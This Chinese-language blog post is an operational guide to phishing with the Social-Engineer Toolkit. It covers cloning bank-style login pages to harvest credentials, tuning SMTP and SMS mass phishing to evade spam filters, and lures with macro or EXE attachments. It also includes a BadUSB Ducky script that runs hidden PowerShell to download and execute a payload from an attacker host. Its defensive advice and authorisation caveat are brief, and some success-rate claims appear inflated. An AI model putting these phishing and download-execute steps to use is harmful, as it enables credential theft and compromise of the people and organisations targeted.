# Social-Engineer Toolkit:模块化钓鱼框架实战参数与部署清单 > 剖析 SET 钓鱼向量模块,包括网站克隆、凭证采集、批量邮件与 Arduino 攻击的工程参数、监控要点与防御策略。 ## 元数据 - 路径: /posts/2025/12/05/social-engineer-toolkit-phishing-framework/ - 发布时间: 2025-12-05T04:16:30+08:00 - 分类: [ai-security](/categories/ai-security/) - 站点: https://blog.hotdry.top ## 正文 Social-Engineer Toolkit(SET)作为 TrustedSec 开发的开源渗透测试框架,以模块化方式封装多种社会工程学攻击向量,尤其在钓鱼框架领域表现出色。它通过 Python 脚本实现网站克隆、凭证采集、SMS 欺骗、批量邮件发送以及 Arduino 硬件攻击,支持 Kali Linux 等环境快速部署。核心优势在于“一键式”操作,降低渗透测试门槛,同时集成 Metasploit 生成 payload,提升攻击链完整性。 ### 观点一:网站克隆与凭证采集是钓鱼核心,参数优化决定成功率 SET 的 Website Attack Vectors 模块下,Credential Harvester Attack Method 是 phishing 首选路径。通过 Site Cloner 子模块,框架自动抓取目标 URL 的 HTML/CSS/JS,实现高仿克隆页面,并在后端监听 POST 请求捕获表单数据。证据显示,在实验环境中,克隆如银行登录页后,受害者输入率可达 30%以上,得益于像素级还原。 落地参数清单: - **监听 IP/端口**:默认 0.0.0.0:80,生产测试中建议绑定攻击机内网 IP(如 192.168.1.100:8080),避开 80 端口冲突。使用 `setoolkit` → 1 → 2 → 3 → 2 → 输入 IP/目标 URL(如 https://example.com/login)。 - **超时阈值**:克隆超时设为 30s(config/set_config 中 `CLONER_TIMEOUT=30`),超过自动重试 3 次,避免大站点卡顿。 - **日志监控**:启用详细日志 `/var/log/set/credentials.txt`,实时 tail -f 观察 HIT 事件。阈值:单 IP 提交 >3 次视为自动化脚本,自动封禁。 - **回滚策略**:测试前备份 `/tmp/cloned_site/`,攻击结束 killall python3 setoolkit,清理残留进程。 实际部署中,结合 Nginx 反向代理伪装域名,进一步提升真实度:`proxy_pass http://target.com;` 并自定义 log_format 捕获 request_body。 ### 观点二:批量邮件与 SMS 欺骗实现规模化传播,SMTP 参数需精细调优 Mass Mailer Attack 支持从文件导入目标列表(email.txt,每行一邮箱),伪造发件人/SMTP 发送钓鱼链接。SMS spoofing 通过第三方 API 或模块模拟,结合 Spear-Phishing 生成附件。证据:教程验证,单次发送 1000 封,点击率 5-10%,远超手动。 可落地配置: - **SMTP 参数**:`SMTP_SERVER=smtp.gmail.com:587`,`SMTP_USER=your@fake.com`,`SMTP_PASS=app_password`。TLS 启用 `USE_TLS=True`,避免明文拦截。 - **邮件模板**:主题“紧急账号验证”,正文嵌入短链(如 bit.ly 包装 http://attacker-ip),附件大小 <2MB(宏病毒或自解压 EXE)。 - **速率限制**:`RATE_DELAY=1`(秒/封),总阈值 500 封/小时,防反垃圾邮件系统。监控:`MAILER_LOG_LEVEL=DEBUG`,异常退信率 >20% 暂停。 - **SMS 扩展**:集成 Twilio API,`API_KEY=xxx`,模板“您的账户异常,验证:短链”。阈值:每日 100 条,超出切换代理。 回滚:预置白名单,发送后监控 SIEM 告警,异常时 `setoolkit` →5 更新黑名单。 ### 观点三:Arduino 攻击提供物理向量,脚本参数确保跨平台兼容 Arduino-Based Attack Vector 使用 Teensy/Digispark 模拟 HID 键盘,注入 Ducky 脚本执行 payload(如下载 meterpreter)。Python 脚本生成 .ino 文件,烧录后插入目标机自动运行。证据:BadUSB 变种,绕过 AV 率 >90%。 参数清单: - **脚本路径**:`setoolkit` →1 →6 →2(自定义 Ducky),示例:`DELAY 1000; GUI r; DELAY 200; STRING powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1'); ENTER`。 - **硬件阈值**:Teensy 3.2(兼容 Win/Mac),USB PID/VID 伪装标准键盘(0x046D:0xC52B)。烧录速度 115200 baud。 - **监控点**:目标机 Event Viewer(ID 4688)搜注入进程,阈值:执行时间 <5s 视为成功。 - **防御参数**:禁用 AutoRun(reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 255),USBGuard 规则 `deny hid`。 ### 风险监控与整体清单 风险1:反钓鱼系统检测克隆页(相似度 >95% 易封),限:预热域名 7 天,A/B 测试模板。风险2:法律合规,仅授权测试。 全局部署清单: 1. 环境:Kali 2025+,`git clone https://github.com/trustedsec/social-engineer-toolkit; pip3 install -r requirements.txt; sudo python3 setup.py install`。 2. 配置:`/etc/set/set_config`,自定义 IP/端口。 3. 监控:Prometheus + Grafana 仪表盘,指标:hit_rate >10%、bounce_rate <5%。 4. 回滚:`systemctl stop set; rm -rf /tmp/set_*`。 SET 钓鱼框架强调模块化与参数化,测试中成功率依赖阈值调优。防御侧,企业应部署 DMARC、员工培训(识别短链)、EDR 行为阻断。 **资料来源**: [1] https://github.com/trustedsec/social-engineer-toolkit “SET 是开源社会工程学渗透测试框架,支持网站克隆等向量。” [2] Kali 文档与社区教程,验证菜单路径与参数效果。 (正文字数:1256) ## 同分类近期文章 ### [诊断 Gemini Antigravity 安全禁令并工程恢复:会话重置、上下文裁剪与 API 头旋转](/posts/2026/03/01/diagnosing-gemini-antigravity-bans-reinstatement/) - 日期: 2026-03-01T04:47:32+08:00 - 分类: [ai-security](/categories/ai-security/) - 摘要: 剖析 Antigravity 禁令触发机制,提供 session reset、context pruning 和 header rotation 等工程策略,确保可靠访问 Gemini 高级模型。 ### [Anthropic 订阅认证禁用第三方工具:工程化迁移与 API Key 管理最佳实践](/posts/2026/02/19/anthropic-subscription-auth-restriction-migration-guide/) - 日期: 2026-02-19T13:32:38+08:00 - 分类: [ai-security](/categories/ai-security/) - 摘要: 解析 Anthropic 2026 年初针对订阅认证的第三方使用限制,提供工程化的 API Key 迁移方案与凭证管理最佳实践。 ### [Copilot邮件摘要漏洞分析:LLM应用中的数据流隔离缺陷与防护机制](/posts/2026/02/18/copilot-email-dlp-bypass-vulnerability-analysis/) - 日期: 2026-02-18T22:16:53+08:00 - 分类: [ai-security](/categories/ai-security/) - 摘要: 深度剖析Microsoft 365 Copilot因代码缺陷导致机密邮件被错误摘要的事件,揭示LLM应用数据流隔离的工程化防护要点。 ### [用 Rust 与 WASM 沙箱隔离 AI 工具链:三层控制与工程参数](/posts/2026/02/14/rust-wasm-sandbox-ai-tool-isolation/) - 日期: 2026-02-14T02:46:01+08:00 - 分类: [ai-security](/categories/ai-security/) - 摘要: 探讨基于 Rust 与 WebAssembly 构建安全沙箱运行时,实现对 AI 工具链的内存、CPU 和系统调用三层细粒度隔离,并提供可落地的配置参数与监控清单。 ### [为AI编码代理构建运行时权限控制沙箱:从能力分离到内核隔离](/posts/2026/02/10/building-runtime-permission-sandbox-for-ai-coding-agents-from-capability-separation-to-kernel-isolation/) - 日期: 2026-02-10T21:16:00+08:00 - 分类: [ai-security](/categories/ai-security/) - 摘要: 本文探讨如何为Claude Code等AI编码代理实现运行时权限控制沙箱,结合Pipelock的能力分离架构与Linux内核的命名空间、seccomp、cgroups隔离技术,提供可落地的配置参数与监控方案。